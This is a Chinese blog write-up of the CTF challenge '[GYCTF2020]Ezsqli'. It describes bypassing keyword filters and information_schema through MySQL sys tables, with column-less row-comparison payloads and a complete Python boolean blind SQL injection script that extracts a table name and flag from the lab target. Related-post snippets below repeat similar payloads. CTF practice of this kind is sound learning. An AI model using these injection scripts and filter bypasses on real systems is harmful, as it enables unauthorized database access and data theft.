[GYCTF2020]Ezsqli

最新推荐文章于 2024-03-22 07:00:00 发布
最新推荐文章于 2024-03-22 07:00:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: mysql 数据库 sql CTF BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45646006/article/details/120073020
版权

[GYCTF2020]Ezsqli

打开网页发现有个输入框,随便输入1 or 2,发现or被过滤了,因此尝试fuzz看看,还过滤了哪些sql关键词,我使用的fuzz字典:

WEB SQL Fuzz Dict

发现iforunioninformation_schema.tables均被过滤,因为输入2||True2||False的返回结果不一致所以要用盲注来判断每个字符是什么。对于过滤掉information_schema的题目,注意到MySQL5.7的新特性:

由于performance_schema过于复杂,所以mysql在5.7版本中新增了sys schemma,基础数据来自于performance_chemainformation_schema两个库,本身数据库不存储数据。

information_schema.tables可以用sys.schema_table_statistics_with_buffersys.x$schema_table_statistics_with_buffer代替。

References

i春秋2020新春公益赛 GYCTF有关SQL注入题复现_qwzf-CSDN博客

由于sys.schema_table_statistics_with_buffersys.x$schema_table_statistics_with_buffer是不存储列名的,所以我们没有办法获取列名,所以我们需要直接得到每一列的数据。使用

(select 1,"F")>(select * from f1ag_1s_h3r3_hhhhh),这个payload的意思就是f1ag_1s_h3r3_hhhhh第二个字段的数据每一个字符与F这个字符串每隔一个字符一一比较大小,如果F比较大,就返回True。以此类推,不断增加字符串长度,就可以得到完整的数据。

编写python脚本:

import requests
import time
Original_url = "http://902427eb-f418-4618-a114-a19aa948ebe9.node4.buuoj.cn:81/index.php"
Success_message = ["Nu1L","V&N"]
data = {"id": ""}
table_name_payload = "2||(select ascii(substr(group_concat(table_name),{},1)) from sys.x$schema_table_statistics_with_buffer where table_schema=database())>{}"
column_1_payload = '2||((select "{}",1)>(select * from {}))'
column_2_payload = '2||((select 1,"{}")>(select * from {}))'

def getname(payload):
    name = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            data["id"] = payload.format(i,mid)
            RowText = requests.post(Original_url, data=data)
            if Success_message[0] in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print("\r表名: " + name, end="")

def GetData(table_name, column_payload):
    flag = ''
    for i in range(1, 100): #数据的第i位
        time.sleep(0.3) #暂停
        begin = 32
        end = 126
        mid = (begin + end) // 2 #取整除,返回商的整数部分(向下取整)
        while begin < end:
            tmp = flag + chr(mid)
            data["id"] = column_payload.format(tmp, table_name)
            RowText = requests.post(Original_url, data=data)
            if Success_message[1] in RowText.text: # 这里用V&N判断
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 33):
            print()
            break
        flag += chr(mid - 1)
        print(("\r表%s的数据: " + flag.lower()) % (table_name), end="")

getname(table_name_payload)
GetData("f1ag_1s_h3r3_hhhhh", column_1_payload)
GetData("f1ag_1s_h3r3_hhhhh", column_2_payload)

运行结果:

表名: f1ag_1s_h3r3_hhhhh,users233333333333333
表f1ag_1s_h3r3_hhhhh的数据: flag{c7ed400c-60f8-4350-bcca-cd92be34c14d}

需要注意的是:

  • 2||((select 1,"{}")>(select * from {}))不能用<比较,flag最后一个}会出现问题。
  • 需要加上time.sleep()暂停,不然会出现乱码。

判断字段数的方法:

  • 输入2||((select 1,1)>(select * from f1ag_1s_h3r3_hhhhh)),发现网页输出Nu1L
  • 输入2||((select 1,1,1)>(select * from f1ag_1s_h3r3_hhhhh)),发现网页输出bool(false)

所以f1ag_1s_h3r3_hhhhh有两个字段。实验表明flag在第二个字段。

References

[GYCTF2020]Ezsqli(无列名注入)

聊一聊bypass information_schema

i春秋2020新春战"疫"网络安全公益赛GYCTF Writeup 第二天 - 颖奇L’Amore

[GYCTF2020]Ezsqli_fmyyy1的博客-CSDN博客

[GYCTF2020] Ezsqli_Lhehe2020的博客-CSDN博客

[GYCTF2020]Ezsqli

yym68686
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
(四)[GYCTF2020]Ezsqli(bool 盲注,无列名注入)
qq_53856457的博客
11-25 607
打开,经典查询框,先随意提交1,post数据,抓包看一下 burp fuzz测试一下,可以看到常用的information,information_schema,or,union等关键字被过滤了,简单尝试后,发现没有回显,也没有报错,当语句为真时返回Nu1L,为假时返回V&N,考虑布尔盲注。 注:补充!!! InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_tabl
[GYCTF2020]Ezsqli ---不会编程的崽
最新发布
不会编程的崽的博客
03-22 402
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
m0_62094846的博客
05-18 587
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
[GYCTF2020]Ezsqli 绕过or information_schema 无列名注入
m0_64180167的博客
10-09 381
说好的ez....我们开始吧首先就直接进行抓包 看回显然后开始正常的测试报错了 这里的。
[GYCTF2020]Ezsqli --BUUCTF
金 帛的博客
06-12 680
BUUCTF记录贴
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 4931
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 354
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 489
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5356
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值